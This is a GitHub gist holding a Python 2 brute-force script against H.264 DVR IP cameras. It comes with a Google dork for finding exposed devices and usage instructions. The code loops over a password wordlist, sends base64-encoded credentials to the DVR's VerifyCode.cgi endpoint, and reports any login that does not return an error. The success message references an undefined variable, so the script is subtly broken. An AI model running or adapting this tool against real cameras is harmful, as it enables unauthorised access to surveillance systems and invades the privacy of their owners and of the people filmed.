Skip to content

Instantly share code, notes, and snippets.

@RedToor
Last active November 8, 2023 19:41
Show Gist options
  • Star 6 You must be signed in to star a gist
  • Fork 6 You must be signed in to fork a gist
  • Save RedToor/71a109a7732884714e8ee07f61cfda59 to your computer and use it in GitHub Desktop.
Save RedToor/71a109a7732884714e8ee07f61cfda59 to your computer and use it in GitHub Desktop.
BruteForce IP CAMERA H.264 DVR - Exploit
# Exploit Title: BruteForce IP CAMERA H.264 DVR
# Google Dork: intext:Any time & Any where IP Surveillance for Your Life
# Date: 10/2/15
# Exploit Author: RedToor
# Source: https://gist.github.com/RedToor/71a109a7732884714e8ee07f61cfda59
# Version: ALL
# Tested on: Windows and Linux
# USE:
# python btDVR.py -h 127.0.0.1 -p 3000 -l passwords.txt -u admin
#
import socket
import base64
import getopt
import sys
options, remainder = getopt.getopt(sys.argv[1:], 'h:p:l:u:')
for option, arg in options:
if option == '-h':
ip=arg
elif option == '-p':
port=arg
elif option == '-u':
user=arg
elif option == '-l':
word=arg
count=0
with open(word, 'r') as claves:
for ps in claves:
count=count+1
ps=ps.replace("\n","")
print "\t["+str(count)+"] Testing with "+ps
path="cgi-bin/nobody/VerifyCode.cgi?account="+base64.b64encode(user+":"+ps)+"&captcha_code=6844&verify_code=685S.p/17Zkkc HTTP/1.1"
red=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
red.connect((ip, int(port)))
red.send("GET /"+path+"\r\nHOST: "+ip+"\r\n\r\n")
last=red.recv(1000)
if last.find("ERROR")<=0:print "\n Cracked with ID:"+us+" and PASS:"+ps+"\n"
else:
print "----------->Fail..."
red.close
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment